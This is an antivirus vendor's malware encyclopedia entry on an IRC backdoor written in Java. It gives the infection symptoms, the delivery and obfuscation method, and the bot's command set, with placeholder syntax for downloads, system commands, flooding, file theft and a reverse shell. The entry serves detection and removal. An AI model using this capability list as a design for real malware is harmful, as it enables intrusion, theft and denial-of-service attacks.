My Bitdefender
  • 0 Shopping Cart

SHARE
THIS ON

Facebook Twitter Google Plus

Java.Backdoor.ReverseBackdoor.A

LOW
MEDIUM
~40KB
(Backdoor:Java/ReverseBackdoor)

Symptoms

 


Increased network activity.
 
It registers itself to be run automatically on system startup:
  • under Windows XP, it copies itself to %HOMEPATH%\Start Menu\Programs\Startup\jusched.jar;
  • under other versions of Windows, it copies itself to
    %HOMEPATH%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jusched.jar.
It also installs a protector component under %HOMEPATH%\syn.jar which protects it from being deleted.

The presence of C:\Program Files\win32.ini. It's used for storing a permanent IRC nickname.

Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

JUHOS Csaba-Zsolt, virus researcher

Technical Description:

 


Java.Backdoor.ReverseBackdoor.A is an advanced IRC backdoor, written in the Java programming language. It allows the download and execution of other malware components, has autoupdate capability and supports an array of spamming commands.
 
In the wild, it can be found as a JAR file, that contains 40 obfuscated class files. The JAR is wrapped into an .exe using jshrink (http://www.e-t.com/jshrink.html) to further obfuscate it. The .exe is downloaded and executed by a malicious applet, which asks the user's permission to circumvent the Java sandbox.
 
The bot starts by reading its online configuration file, which includes the IRC server's host and port, the input and output channel names, and the nicknames of the botmasters. It forks a command and control thread, registers itself as an autorun, and finishes by dropping and executing syn.jar, to protect itself from deletion.
 
The command and control thread executes commands given on the IRC channels by the botmasters. Some of the supported commands:
 
  1. .commands: list all available commands, including command usage and description
  2. .exit: terminate the bot
  3. .quit <message>: quit IRC server
  4. .join <channel>: join an IRC channel
  5. .part <channel>: part an IRC channel
  6. .nickprefix <prefix>: change nick to a random number prefixed by <prefix>
  7. .permnick <nick>: change to a permanent nick
  8. .msg <channel> <message>: send a message to an IRC channel
  9. .raw <line>: send raw IRC command
  10. .download <url> [dir]: download file to the infected system
  11. .system <command>: execute system command
  12. .httpflood <url> <threads> <delay> <connections>
    .udpflood <host> <threads> <delay> <connections>
    .sflood <host> <port> <threads> <delay> <connections>
    .stopfloods
    HTTP, UDP and arbitrary socket flood
  13. .getip [url]: get the IP address of the infected system
  14. .mkdir <dir>: make directory
  15. .cd <dir>: change current directory
  16. .ls: list the contents of the current directory
  17. .corrupt <file> [message]: truncate file or replace it with a message
  18. .update <url>: update the bot with the JAR at <url>
  19. .send <send> <file> <port>: upload file from the infected system
  20. .spam <server> <port> <channel> [password] <nick> <message> <times> <delay>
    .stopspam
    IRC flood
  21. .backdoor <host> <port>: create a reverse shell on the infected system, controlled by<host>
  22. .ircscript <url>: run IRC script at <url>